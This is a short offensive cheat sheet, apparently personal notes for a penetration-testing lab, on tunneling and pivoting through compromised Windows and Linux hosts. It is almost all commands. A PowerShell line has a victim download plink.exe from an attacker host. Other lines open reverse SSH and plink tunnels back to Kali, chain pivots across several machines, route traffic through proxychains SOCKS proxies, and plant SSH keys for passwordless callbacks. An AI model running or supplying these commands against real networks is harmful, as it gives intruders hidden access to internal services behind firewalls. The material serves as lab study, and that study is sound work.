AD Attack Tunneling / (with SSH key) Burp > proxychains > app: Settings > Network > Connections > SOCKS Proxy
sudo netstat -tulpn
to check tunnel connections
plink ssh to kali from victim
Copy #victim
netstat -ano #to see undiscovered service during nmap
#kali
python -m http.server 8080 #to host plink
service ssh start
#victim
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.158:8080/plink.exe','C:/hfs/tmp/plink.exe')
cmd.exe /c echo y | plink.exe -ssh -l kali -pw kalipwd -R 192.168.119.158:7799:127.0.0.1:445 192.168.119.158
#kali
nmap -sT -sV -sC 127.0.0.1 7799
:445 = internal service ; :7799 = kali tunnel port to the target :445
Copy #machine C
plink.exe -ssh -l b.user -pw b.pwd -N -R 10.1.1.9:1069:127.0.0.1:9050 10.1.1.9
#machine B 10.1.1.9
plink.exe -ssh -l kali -pw kalipwd -N -R 192.168.119.158:7799:127.0.0.1:1069 192.168.119.158
tunneling machine C :9050 to kali :7799 through machine B :1069
ssh to victim from kali
Copy /etc/proxychains4.conf:
socks4 127.0.0.1 9050
socks4 127.0.0.1 9060
sudo ssh -N -D 127.0.0.1:9050 sean@10.11.1.251
sudo ssh -N -D 127.0.0.1:9060 j0hn@10.11.1.252 -p 22000 -o KexAlgorithms=+diffie-hellman-group1-sha1 -o HostKeyAlgorithms=+ssh-rsa
pivot machine 8888 to windows victim 3389 (need victim pw)
Copy ssh -L 8888:192.168.1.90:3389 root@192.168.1.90 #-f bg
( on pivot machine rdp 127.0.0.1:8888)
kali connect to pivot machine 8888 to final victim 3389
Copy rdp 192.168.2.90:8888
ssh from victim to kali
Copy # bind next client :22 to kali 1122, next client 3306 to kali 13306
ssh -f -N -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /tmp/keys/id_rsa kali@192.168.45.5
prevent ssh from asking for kali pwd with id_rsa
Copy # in /tmp on 1st victim
mkdir keys
cd keys
ssh-keygen
> /tmp/keys/id_rsa
cat id_rsa.pub
cop to kali ~/.ssh/authorized_keys
dynamic port forwarding
Copy /etc/proxychains4.conf:
socks4 127.0.0.1 9050
ssh -f -N -R 9050 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i
/tmp/keys/id_rsa kali@192.168.119.173
windows allowing other access local :80
Copy # 192.168.1.90:8080 = victim:80 (initiate from victim)
ssh -R 8080:internalwww:80 user@192.168.1.90